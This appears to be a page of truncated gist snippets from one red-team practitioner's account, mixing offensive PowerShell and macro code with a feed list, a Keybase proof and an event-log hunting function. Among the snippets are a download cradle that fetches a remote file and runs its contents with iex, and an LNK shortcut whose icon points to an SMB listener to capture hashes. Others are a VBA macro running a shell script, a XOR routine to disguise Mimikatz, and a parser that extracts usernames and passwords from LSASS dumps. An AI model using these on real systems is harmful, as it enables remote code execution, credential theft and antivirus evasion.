breakersall

interact.sh
oast.pro
oast.live
oast.site
oast.online
oast.fun
oast.me
burpcollaborator.net 
oastify.com
canarytokens.com

breakersall

# Copied from Lee Homes  / @Lee_Holmes code copied from https://www.youtube.com/watch?time_continue=206&v=1S9YNJpktBM
$ip = "8.8.8.8"
$port = "80"
$tcpClients = New-Object System.Collections.ArrayList

$Counter = 0
while($true)
{
  "Lauching Client $counter"
  $counter++

breakersall

<?xml version="1.0" encoding="UTF-8"?>

<opml version="1.0">
    <head>
        <title>Matt subscriptions in feedly Cloud</title>
    </head>
    <body>
        <outline text="RedTeaming" title="RedTeaming">
            <outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/>
            <outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/>

breakersall

Keybase proof

I hereby claim:

• I am breakersall on github.
• I am breakersall (https://keybase.io/breakersall) on keybase.
• I have a public key ASDNWjIrvzU3731TQaVF4SQ8zzSuGTG46jMIxSvVgt9Gpgo

To claim this, I am signing this object:

breakersall

$proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
$wc.proxy = $proxy
$d = New-Object System.Xml.XmlDocument
$d.Load($wc.DownloadData("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt"));
$d.command.a.execute | iex

breakersall

$LinkedEXE = "$env:SystemRoot\System32\notepad.exe"
$LNKSaveFile = "pathtosavelnk"
$WScriptShell = New-Object -ComObject Wscript.Shell
$Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile)
$Shortcut.TargetPath = $LinkedEXE
$Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico"
$Shortcut.save()

breakersall

Sub zxzcvzxcvzxvxzcv()
'
myAppleScript = "do shell script ""/usr/bin/python -c 'import webbrowser; webbrowser.open_new(\""http://google.com\"")' """
MacScript (myAppleScript)
'
​
End Sub

breakersall

#######EncodeExample
$inputMim = "C:\Tools\Mimikatz.txt"
$OutMimEnc = "C:\Tools\EncMimikatz.txt"
$bytes = [System.IO.File]::ReadAllBytes("$inputMim")
$key = 137
for($i=0; $i -lt $bytes.count ; $i++)
{
$bytes[$i] = $bytes[$i] -bxor $key
}
[System.IO.File]::WriteAllBytes("$OutMimEnc", $bytes)

breakersall

Function ParseMimiLsass
		{
			$UnameRegex = '^*[Username]{8}'
			$DomainRegex = '^*[Domain]{6}'
			$PassRegex = '^*[Password]{8}[ ][:]'
			$Domains = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $DomainRegex  | Select-Object Line
			$Usernames = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $UnameRegex  | Select-Object Line
			$Passwords = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $PassRegex  | Select-Object Line
			$Domains32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $DomainRegex  | Select-Object Line
			$Usernames32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $UnameRegex  | Select-Object Line

breakersall

#Number of minutes to go
[int]$MinutesToCheck = 10080
function Find-4648Logons
{
<#
.SYNOPSIS
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the 
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
Function: Find-4648Logons